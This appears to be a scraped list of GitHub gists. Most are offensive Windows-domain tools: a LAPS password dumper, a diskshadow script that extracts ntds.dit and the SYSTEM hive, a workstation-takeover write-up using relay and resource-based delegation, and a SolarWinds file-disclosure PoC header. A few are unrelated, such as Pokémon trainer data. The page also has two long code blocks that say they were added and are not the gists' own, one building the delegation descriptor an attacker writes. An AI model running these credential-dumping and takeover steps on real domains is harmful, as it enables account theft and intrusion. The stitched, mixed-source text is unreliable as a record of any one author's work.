Chris Farrell seajaysec

@Flangvik
Flangvik / gist:3c02bae70e6d34d542783d07c8cbe584
Last active December 8, 2024 21:33
S4USelf_ZeroToHero.py
import sys
import os
import argparse
import getpass
import logging
import subprocess
import shlex
import base64
# Needs PKINITtools by @_dirkjan installed, or this script must be run from the same directory
@nullenc0de
nullenc0de / api-linkfinder.sh
Created August 7, 2021 11:17
Exports links and params from API documentation
wget https://gist.githubusercontent.com/nullenc0de/bb16be959686295b3b1caff519cc3e05/raw/2016dc0e692821ec045edd5ae5c0aba5ec9ec3f1/api-linkfinder.yaml
echo https://stripe.com/docs/api | hakrawler -t 500 -d 10 | nuclei -t ./api-linkfinder.yaml -o api.txt
cat api.txt |grep url_params |cut -d ' ' -f 7 |tr , '\n' | tr ] '\n' | tr [ '\n' |tr -d '"' |tr -d "'" |sort -u > api_params.txt
cat api.txt |grep relative_links |cut -d ' ' -f 7 |tr , '\n' | tr ] '\n' | tr [ '\n' |tr -d '"' |tr -d "'" |sort -u > api_link_finder.txt
@jstnkndy
jstnkndy / laps.py
Created August 6, 2021 15:02
Modified version of https://github.com/n00py/LAPSDumper to allow cross domain targeting
#!/usr/bin/env python3
from ldap3 import ALL, Server, Connection, NTLM, extend, SUBTREE
import argparse
parser = argparse.ArgumentParser(description='Dump LAPS Passwords')
parser.add_argument('-u','--username', help='username for LDAP', required=True)
parser.add_argument('-p','--password', help='password for LDAP (or LM:NT hash)',required=True)
parser.add_argument('-l','--ldapserver', help='LDAP server (or domain)', required=False)
parser.add_argument('-d','--domain', help='Domain', required=True)
parser.add_argument('-t', '--target', help="Target Domain", required=False)
@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active March 17, 2025 03:05
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. In short, this is accomplished by:

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
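The second and third steps above come down to one LDAP write: a security descriptor stored in the victim computer's msDS-AllowedToActOnBehalfOfOtherIdentity attribute naming the account that may impersonate users to that host. The block below is an added example, not code from this gist or its author, that builds such a descriptor the way common relay tooling does (self-relative SD, owner and group BUILTIN\Administrators, one ACCESS_ALLOWED ACE granting GENERIC_ALL per delegated SID) and decodes one back into the SIDs it authorises, which is the check a defender runs over that attribute. The SID S-1-5-21-1-2-3-1105 is a constructed attacker account; nothing here talks to LDAP.

```python
"""Build and decode the msDS-AllowedToActOnBehalfOfOtherIdentity descriptor (RBCD).

Pure standard library; binary layouts follow MS-DTYP (SECURITY_DESCRIPTOR,
ACL, ACCESS_ALLOWED_ACE, SID). Example code, not the gist's own.
"""
import struct

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACL_REVISION_DS = 4                 # revision relay tooling uses for the DACL
ACCESS_ALLOWED_ACE_TYPE = 0x00
GENERIC_ALL = 0x000F01FF            # mask granted to the attacker-controlled account
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"

SD_HEADER = "<BBHIIII"   # Revision, Sbz1, Control, OffsetOwner, OffsetGroup, OffsetSacl, OffsetDacl
ACL_HEADER = "<BBHHH"    # AclRevision, Sbz1, AclSize, AceCount, Sbz2
ACE_HEADER = "<BBHI"     # AceType, AceFlags, AceSize, Mask


def sid_to_bytes(sid):
    """Encode 'S-1-5-21-...' into the binary SID layout used inside an ACE."""
    parts = sid.split("-")
    revision, authority = int(parts[1]), int(parts[2])
    subauths = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", revision, len(subauths))
            + authority.to_bytes(6, "big")                      # IdentifierAuthority is big-endian
            + b"".join(struct.pack("<I", s) for s in subauths))  # SubAuthority values little-endian


def sid_from_bytes(blob, offset):
    """Decode a binary SID at offset; return (sid_string, bytes_consumed)."""
    revision, count = struct.unpack_from("<BB", blob, offset)
    authority = int.from_bytes(blob[offset + 2:offset + 8], "big")
    subauths = struct.unpack_from("<%dI" % count, blob, offset + 8)
    sid = "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subauths))
    return sid, 8 + 4 * count


def build_rbcd_descriptor(delegate_sids):
    """Self-relative SD whose DACL grants GENERIC_ALL to every SID in delegate_sids.

    This is the value an attacker writes (via relayed LDAP) to the victim
    computer object to enable RBCD from the account(s) given.
    """
    aces = b""
    for sid in delegate_sids:
        sid_bytes = sid_to_bytes(sid)
        aces += struct.pack(ACE_HEADER, ACCESS_ALLOWED_ACE_TYPE, 0,
                            struct.calcsize(ACE_HEADER) + len(sid_bytes), GENERIC_ALL) + sid_bytes
    dacl = struct.pack(ACL_HEADER, ACL_REVISION_DS, 0,
                       struct.calcsize(ACL_HEADER) + len(aces), len(delegate_sids), 0) + aces
    owner = group = sid_to_bytes(BUILTIN_ADMINISTRATORS)
    off_owner = struct.calcsize(SD_HEADER)
    off_group = off_owner + len(owner)
    off_dacl = off_group + len(group)
    header = struct.pack(SD_HEADER, 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         off_owner, off_group, 0, off_dacl)
    return header + owner + group + dacl


def allowed_to_act(blob):
    """Return [(sid, mask), ...] from the DACL: accounts allowed to impersonate to this host.

    Feed it the raw attribute bytes read back from LDAP to audit a computer object.
    """
    _, _, control, _, _, _, off_dacl = struct.unpack_from(SD_HEADER, blob, 0)
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from(ACL_HEADER, blob, off_dacl)
    pos = off_dacl + struct.calcsize(ACL_HEADER)
    result = []
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from(ACE_HEADER, blob, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sid, _ = sid_from_bytes(blob, pos + struct.calcsize(ACE_HEADER))
            result.append((sid, mask))
        pos += ace_size            # AceSize lets us skip ACE types we do not decode
    return result


if __name__ == "__main__":
    attacker = "S-1-5-21-1-2-3-1105"   # constructed SID of an attacker-controlled account
    sd = build_rbcd_descriptor([attacker])
    print(len(sd), "bytes:", allowed_to_act(sd))
```

For auditing, read msDS-AllowedToActOnBehalfOfOtherIdentity as raw bytes over LDAP and pass it to allowed_to_act(); any SID that is not a known front-end service account is a finding. At the relay stage itself the write only succeeds because LDAPS accepted the relayed machine authentication, so enforcing channel binding (Extended Protection) on the domain controllers' LDAPS endpoint breaks this chain.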

@luckytyphlosion
luckytyphlosion / all_radical_red_trainer_sets_out.txt
Last active July 12, 2022 20:56
Pokémon Radical Red 2.3a Trainer Data
Anything without IVs means 0 IVs straight, not perfect IVs.
Used the same script to dump Pokémon Clover trainers. The internal trainer format is actually documented at Skeli's CFRU repository, but I didn't feel like writing a separate dumper, so I repurposed the Clover Lua script (link: https://github.com/luckytyphlosion/PokemonBizhawkLua/tree/radical-red) (tested with Bizhawk 2.5.2).
Note: Pokémon Gender is incorrect (it just uses the gender of the trainer itself), but I was too bothered to fix it.
Some trainer sets have random abilities on mons, which are denoted by "or" on the Ability line when applicable (e.g. Intimidate or Moxie)
-------------------------------------------------------
@XargonWan
XargonWan / vmprep.sh
Last active February 3, 2021 17:00
351ELEC Toolchain - VMPREP
#!/bin/bash
# This is the VMPrep based on Ubuntu
# Just grab your favorite Vm (I used VirtualBox), install any ubuntu (I used lubuntu) and follow these instructions
# This is written as a script but I am not sure if it's working as an automated script: it should, but I haven't tested it yet.
touch ~/Desktop/351minal.sh
echo '#!/bin/bash' >> ~/Desktop/351minal.sh
echo 'sudo lxc-start 351elec' >> ~/Desktop/351minal.sh
echo 'sudo lxc-attach 351elec' >> ~/Desktop/351minal.sh
chmod +x ~/Desktop/351minal.sh
@nullenc0de
nullenc0de / breach.sh
Created January 27, 2021 15:06
Script will look up company assets and search them on greynoise.
cat cust.txt |assetfinder -subs-only | filter-resolved -c 100 | while read resolved; do host -t A "$resolved" | awk '{print $NF}' | grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'; done |sort -u |while read ip; do greynoise quick $ip ; done |grep -v "NOT" |cut -d ' ' -f1 |greynoise ip |sed -e '/malicious/,/rDNS/!d'
@0xsha
0xsha / Solarwinds_Orion_LFD.py
Last active September 24, 2024 05:28
Solarwinds_Orion_LFD local file disclosure PoC for SolarWinds Orion (aka door to SuperNova?)
# CVE-2020-10148 (local file disclosure PoC for SolarWinds Orion aka door to SuperNova ? )
# @0xSha
# (C) 2020 0xSha.io
# Advisory : https://www.solarwinds.com/securityadvisory
# Mitigation : https://downloads.solarwinds.com/solarwinds/Support/SupernovaMitigation.zip
# Details : https://kb.cert.org/vuls/id/843464
# C:\inetpub\SolarWinds\bin\OrionWeb.DLL
# According to SolarWinds.Orion.Web.HttpModules
@snovvcrash
snovvcrash / oaburl.py
Last active December 29, 2022 19:53
Send request to the MS Exchange Autodiscover service (MS-OXDSCLI protocol) and parse the response. Hunting for the OABUrl value. Credits to @ptswarm: https://swarm.ptsecurity.com/attacking-ms-exchange-web-interfaces/
#!/usr/bin/env python3
# Usage: python3 oaburl.py MEGACORP/j.doe:'Passw0rd!'@mx.example.com -e [email protected]
from xml.dom import minidom
from argparse import ArgumentParser
from getpass import getpass
import requests
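The gist posts an Autodiscover request and hunts the response for the OABUrl value. As an added example (not snovvcrash's code), the block below builds the MS-OXDSCLI request body Outlook sends to /autodiscover/autodiscover.xml, pulls every OABUrl out of a response, and recognises the Error element Exchange returns for a rejected request. The response document, hostname and OAB GUID in it are constructed; actually sending the body (an HTTP POST with the credentials the gist's usage line shows) is left out so the example runs offline.

```python
"""Autodiscover (MS-OXDSCLI) request body and OABUrl extraction. Example code, not the gist's own."""
import xml.etree.ElementTree as ET

REQUEST_NS = "http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006"
RESPONSE_NS = "http://schemas.microsoft.com/exchange/autodiscover/responseschema/2006"
OUTLOOK_RESPONSE_NS = "http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"


def build_autodiscover_request(email):
    """POST body for /autodiscover/autodiscover.xml (Content-Type: text/xml)."""
    root = ET.Element("Autodiscover", xmlns=REQUEST_NS)
    req = ET.SubElement(root, "Request")
    ET.SubElement(req, "EMailAddress").text = email
    ET.SubElement(req, "AcceptableResponseSchema").text = OUTLOOK_RESPONSE_NS
    return b'<?xml version="1.0" encoding="utf-8"?>' + ET.tostring(root)


def extract_oab_urls(xml_bytes):
    """Map Protocol/Type (EXCH, EXPR, ...) to its OABUrl for every protocol block that has one."""
    root = ET.fromstring(xml_bytes)
    ns = {"r": OUTLOOK_RESPONSE_NS}
    found = {}
    for proto in root.iterfind(".//r:Protocol", ns):
        url = proto.findtext("r:OABUrl", namespaces=ns)
        if url:
            found[proto.findtext("r:Type", default="?", namespaces=ns)] = url.strip()
    return found


def autodiscover_error(xml_bytes):
    """Return (ErrorCode, Message) if the server answered with an Error element, else None."""
    root = ET.fromstring(xml_bytes)
    err = root.find(".//{%s}Error" % RESPONSE_NS)
    if err is None:
        return None
    return (err.findtext("{%s}ErrorCode" % RESPONSE_NS),
            err.findtext("{%s}Message" % RESPONSE_NS))


# Constructed sample of a successful response (hostname and OAB GUID are made up).
SAMPLE_RESPONSE = b"""<?xml version="1.0" encoding="utf-8"?>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/responseschema/2006">
  <Response xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
    <User><DisplayName>John Doe</DisplayName></User>
    <Account>
      <AccountType>email</AccountType>
      <Action>settings</Action>
      <Protocol>
        <Type>EXCH</Type>
        <Server>mx.example.com</Server>
        <OABUrl>https://mx.example.com/OAB/5a2b3c4d-0000-4000-8000-000000000000/</OABUrl>
      </Protocol>
      <Protocol>
        <Type>EXPR</Type>
        <Server>mx.example.com</Server>
        <OABUrl>https://mx.example.com/OAB/5a2b3c4d-0000-4000-8000-000000000000/</OABUrl>
      </Protocol>
    </Account>
  </Response>
</Autodiscover>"""

# Constructed sample of the error shape returned for a malformed or unknown-address request.
SAMPLE_ERROR = b"""<?xml version="1.0" encoding="utf-8"?>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/responseschema/2006">
  <Response>
    <Error Time="12:00:00.0000000" Id="1234567890">
      <ErrorCode>600</ErrorCode>
      <Message>Invalid Request</Message>
      <DebugData />
    </Error>
  </Response>
</Autodiscover>"""

if __name__ == "__main__":
    print(build_autodiscover_request("j.doe@example.com").decode())
    print(extract_oab_urls(SAMPLE_RESPONSE))
    print(autodiscover_error(SAMPLE_ERROR))
```

Check autodiscover_error() before extract_oab_urls(): a 600 "Invalid Request" response carries no Protocol blocks, and an empty result is otherwise indistinguishable from a mailbox that simply has no OAB configured.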
@b1gbroth3r
b1gbroth3r / diskshadow.txt
Last active February 10, 2022 20:27
Automates retrieval of system hive & ntds.dit using diskshadow.exe for password auditing/hash cracking. Modify where necessary. Please verify that the Z: drive isn't already mapped on the DC before running this. Running unix2dos against the .txt and .cmd files wouldn't hurt either.
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec scriptfile.cmd
delete shadows volume %someAlias%
reset
exit